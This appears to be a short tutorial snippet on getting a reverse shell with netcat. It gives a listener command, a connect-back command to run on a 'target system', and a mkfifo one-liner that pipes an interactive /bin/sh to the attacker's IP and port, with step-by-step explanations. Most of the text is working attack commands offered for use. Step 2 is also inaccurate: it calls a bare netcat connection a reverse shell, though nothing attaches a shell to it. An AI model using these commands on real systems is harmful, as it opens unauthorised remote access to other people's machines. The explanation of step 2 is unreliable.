1. Establish a listening connection on your machine
nc -l -p <your_port>
This command starts netcat in listening mode (-l) on a specific port (-p <your_port>). It means your machine will be ready to accept incoming connections on the specified port.
2. Instruct the target system to connect back to you:
nc <your_ip> <your_port>
This command is intended to be executed on the target system. It tells the target system to initiate a connection back to your machine’s IP address (<your_ip>) on the specified port (<your_port>). This essentially establishes a reverse shell, where the target system connects back to your listening netcat instance.
Bonus Tip: Alternative using a named pipe and shell:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <your_ip> <your_port> >/tmp/f
This command does the following:
- Removes any existing file named /tmp/f.
- Creates a named pipe (mkfifo /tmp/f), which is a special type of file used for inter-process communication.
- Reads from the named pipe (cat /tmp/f) and pipes it to /bin/sh -i 2>&1. This essentially opens an interactive shell.
- Sends the output of the shell to your machine using nc <your_ip> <your_port>.
- Writes the received data back to the named pipe (>/tmp/f).
This alternative command achieves a similar result as the previous example but uses a named pipe for the communication between the shell and netcat.
